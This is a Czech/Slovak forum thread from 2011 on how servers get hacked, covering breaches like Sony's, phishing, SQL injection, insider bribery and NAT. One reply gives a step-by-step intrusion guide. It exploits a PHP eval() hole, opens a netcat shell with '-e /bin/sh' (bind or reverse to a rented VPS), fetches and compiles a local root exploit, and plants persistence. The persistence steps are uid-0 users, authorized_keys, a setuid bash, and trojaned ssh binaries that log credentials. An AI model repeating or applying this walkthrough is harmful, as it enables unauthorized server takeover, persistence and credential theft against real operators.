Jak se útočí na server?

x

Re: Jak se útočí na server?
« Odpověď #15 kdy: 19. 10. 2011, 01:49:13 »
Zdravím,
tušíte někdo teoreticky, jak se může stát, že např. společnosti sony ukradnou hackeři data o klientech? Nezajímá mě to z důvodu, že bych si chtěl hrát na nějakého rádoby hackera nebo něco podobného, jen mi to přijde takové hrozně nereálné, že někdo nějakým způsobem např. rozběhne svůj program na cizím PC. Myslíte, že na světe existuje třeba jednotlivec, který kdybyste mu dali mojí IP, tak by např. do 24 hodin zařídil, že mi zčerná obrazovka a objeví se tam nějaký nápis?

Verte tomu, ze na svete existuji lide, proti kterym je i Linus nebo jine podobne osobnosti totatlni cucak a ti pokud chteji neci data, tak je dostanou. Tam uz je pak obrana se leda nechat poslat i s celou historii na Proxima Centauri :-)

Na druhou stranu drtiva vetsina populace a firem je pro takove osobnosti neco jako mravenec pro slona, takze po na slapou nebo nas prekracuji a neprojevuji absolutne zadny zajem.

A pokud jste mel nekdy tu cest zazit velkou korporaci nebo nedej boze statni podnik (nemocnice, socialni urady, sprava dat socialniho zabezpeceni a podobne), tak presne od te chvile by jste musel vedet, ze cokoliv provedete doma/ve firme je vam uplne k hounu, protoze to co dokazi tam v ramci zpraseni bezpecnosti dat se rovna tomu jako kdyz to rovnou vsechno sam posilate spatne strane :-)  A upozornuju, ze to se nejeda jen o CR, ale i o perly z USA kde v jednom state byla ukradena napr. veskera data 4 milionu obyvatel a ze takovych uz bylo. Ted by bylo jeste fajn vedet o kolika podobnych se nevi u tech velkych korporaci a vysledky obrazek je velmi tristni.


Regulus

Re: Jak se útočí na server?
« Odpověď #16 kdy: 19. 10. 2011, 06:51:40 »
Má z tohoto hlediska význam to, že se fyzicky připojuji k NETu pouze po dobu , kterou na něm pracuji, to znamená, pokud odesílám/příjímám poštu , stahuji aktualizace,surfuji ,  popřípadě žvaním?
Tím fyzickým přípojením myslím to, že po ukončení těchto operací kabel prostřednicvím spojky z routeru vythánu!

Nemouš Hloupý

Re: Jak se útočí na server?
« Odpověď #17 kdy: 19. 10. 2011, 08:48:41 »
Vidíte, a tu nejjednodušší věc jste zapomněli. Uděláte pěkně vypadjící webovou stránku, která obsahuje vhodně upravený skriptík, který použije nějaké hezké zranitelnosti (ty se dají koupit - tedy popis použití, na netu - pokud víte, kam jít, tak se doptáte), kterých je stále ještě desítky. Pak pošlete uživateli mail, který jej donutí se na tu stránku juknout. A jste u něj.

Ke kradení velkých množství dat se používají jiné mechanismy, které jsou z repertoáru webových útoků: SQL injecty, Cross Site skriptování, vložený kód do podvrhnutých stránek a pod.

Ale ze všeho nejlepší je zaplatit si hodného zaměstnance, který má k těm datům přístup (třeba je to backup admin)...  :P

smoofy

  • *****
  • 1 059
    • Zobrazit profil
    • E-mail
Re: Jak se útočí na server?
« Odpověď #18 kdy: 19. 10. 2011, 09:33:16 »
to Nemous Hloupy:
Jenze i tyhle techniky vyzadujou spise socialni inzenyrstvi nez-li kdovijake technicke znalosti a skilly, nakolik musite nejakym zpusobem uzivatele donutit se na tu stranku kouknout. To ze existuji vetsi borci nez-li Linus a spol ve sfere hackingu je nabiledni. Je ovsem nutne si uvedomit, ze Linus neni bezpecnostni profesional a jeho primarni amereni je trosku nekde jinde. Je to podobny, jako bych srovnaval Sebrleho s Rosickym. Ma sice vyborny fyzicky predpo, klady, ale do balonu treba kopnout neumi (to je jenom prirovnani, treba hraje jako panbuh). Bezpecnostni profesional zna slabiny jednotlivych protokolu/aplikaci a umi jich vyuzit. Muj nazor je stejny, jako nekolikrat omilane klise na vsech strankach o hackingu. Abyste mohli byt skvelym white-hatem musite zacit jako black-hat o tom zadna. Ne nadarmo se v historii bezpecnostnich slozek vyuzivali a stale vyuzivaji zlocinci a vyvrhelove :). Nikdo nema totiz v danem odvetvi lepsi prehled nez-li oni a co si budem povidat, az na vyjimky to vetsina delala hlavne kvuli penezum, takze kdyz jim vlada zacvakala rozumnej peniz tak proc ne.
Co se tyce placeni toho hodneho zamestnance tak tam bych byl moooc opatrnej. Ono totiz nekoho uplatit neni tak jednoduchy jak se na prvni pohled muze zdat, to za prve a za druhe se k takovemu cloveku musite nejdrive dostat a zjistit kdo to je coz vetsinou taky na na trochu te hackerske/detektivni prace.

PCnity

  • *****
  • 691
    • Zobrazit profil
    • E-mail
Re: Jak se útočí na server?
« Odpověď #19 kdy: 19. 10. 2011, 17:30:16 »
Sony a ten utok je ina trieda... Mozem popisat len to co obcas robim z pasie.

1) Socialne inzinierstvo vyzaduje gule... Klud... Nesmies byt nervozny a posobit prorodzene. IMHO fest tazka vec a velmi obdivujem Kevina Mitnicka ktori dokazal rolko vody namusit aj ked bol lepsi v komunikacii s ludmi nez programator/cracker.

2) Najjednoduchsia cesta je dat dole neaktualizovane weby pod spravou buranov... Pamate sa na probelm v roundcube spred asi 2 rokov? html2text.php pomocou craftovaneho POST requestu sa dalo vyuzit v php eval(); Nic viac nebolo treba... :)

Si zober ze mas linuxovy server kde mas php pustene v default konfiguracii. Nebolkuje funkcie, nema safe mode... Mas skoro vyhrate.

a) najst zranitelnost cez ktoru sa dostanes k php eval(); na lamerskom serveri
b) pustis si system command na styl /usr/bin/nc -l -p10000 -vvv -e /bin/sh
Pravdaze treba dufat ze nemaju aktivny firewall na inbound traffic, ale aj kebyze ano, zozenies si dakde VPS zadarmo (bezne na 24h) aj s verejnou IP na TEST ;) a pripojis sa reverzne na svoju IP... Cize na svojej masine nechas nc v listen a pripojis sa s nc na serveri ktory prave davas dole.
c) Mas bash... plne funkcny... :) Ale si neprivilegovany uzivatel typu www-data
uname -a... pozriet aky cron bezi ake ine programy bezia a na cvedetail treba hladat zranictelnosti idealne aj s verejnym exploitom...
d) skomilujes explot... dakam zavesis... wget :) Pripadne ak mam pozit ze admin je tazky flakac tak vascinou komplujem expolity priamo na jeho serveri ak ma toolsy... setri to cas.
e) po chvili snazenia sa mas root shell... ;)
Vasinou mavaju flakaci kopec systemovych userov... Staci par zmenit aby mali /bin/sh a dam ti do home foldrov authorized keys... Myslim si ze heslo v shadow je via do oci bijuce.
Pripadne si rovo vytvoris nejakeho systemovo znejuceho usera s uid 0 gid 0... Ak je admin flakac, nic si nevsime.
f) je dobre si urobit par suid binarok... S oblubou si skopirujem bash a nastavim mu suid. Potom ho staci volat /cest/k/suid-bash -p a mas efektivne root prava.

Dalsie kroky su uz potom na utocnikovi... Ale zaklad je nahradit binarky ssh alebo shellu aby logovali... Ak mas stastie, mas po case celu siet.

Este odporucanie na zaver... Pouzivaj torify :)


qk

Re: Útok na server
« Odpověď #20 kdy: 21. 10. 2011, 09:35:06 »
Citace
Já myslím, že by se minimálně museli zeptat na heslo, ať už verbálně, nebo nonverbálně :-)


pokud maji fyzicky pristup k pocitaci tak se ptat nemusi

DgBd

  • ****
  • 282
    • Zobrazit profil
    • E-mail
Re: Útok na server
« Odpověď #21 kdy: 21. 10. 2011, 11:50:03 »
Citace
Já myslím, že by se minimálně museli zeptat na heslo, ať už verbálně, nebo nonverbálně :-)


pokud maji fyzicky pristup k pocitaci tak se ptat nemusi

se zašifrovaným diskem?

asdfsdfgsdfg

Re: Útok na server
« Odpověď #22 kdy: 21. 10. 2011, 14:27:22 »
Ked je tvoj PC za NATom, tak na nom tazko niekto nieco spravi.
Nevis o cem mluvis. Se zbytkem tvyho prispevku asi taky nema cenu ztracet cas

PCnity

  • *****
  • 691
    • Zobrazit profil
    • E-mail
Re: Jak se útočí na server?
« Odpověď #23 kdy: 21. 10. 2011, 15:05:02 »
NAT nie je firewall. A System za NATom nie je chraneny.
Na temu NAT traversal sa tu toho uz pisalo dost.

Jenda

Re: Jak se útočí na server?
« Odpověď #24 kdy: 21. 10. 2011, 16:21:52 »
DgBd - ale prece jenom, ktery blbec spousti pdf s pravy roota :)
Nikdo. Ale
  • dost škody se dá napáchat i pod běžným uživatelem
  • na roota se dostane při nejbližším su (případně pokud ti - jako teď mně - běží terminál, kde jsi přihlášen jako root)

Jenda

Re: Útok na server
« Odpověď #25 kdy: 21. 10. 2011, 16:23:15 »